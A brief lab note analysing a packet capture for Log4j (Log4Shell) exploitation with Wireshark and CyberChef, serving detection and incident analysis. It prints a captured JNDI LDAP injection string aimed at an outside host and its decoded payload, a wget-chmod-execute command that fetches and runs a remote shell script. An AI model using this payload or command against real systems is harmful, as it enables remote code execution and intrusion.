LOG4J ANALYSIS
Last updated
Last updated
root@dco:~$ wireshark &
root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/http.pcapng
#step 1: get an overview
WireShark
Filter: http.request.method == "POST" && http.user_agent contains $
* 444 3163.829852 45.137.21.9 198.71.247.91 HTTP 447 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==} POST / HTTP/1.1
WireShark > Packet List > Packet Details > right-click user-agent > Copy > Value
${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
root@dco:~$ cyberchef.io
input: d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==
recipe: From Base64
recipe: Defang IP Addresses
output: wget http://62[.]210[.]130[.]250/lh.sh;chmod +x lh.sh;./lh.sh
* be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsers
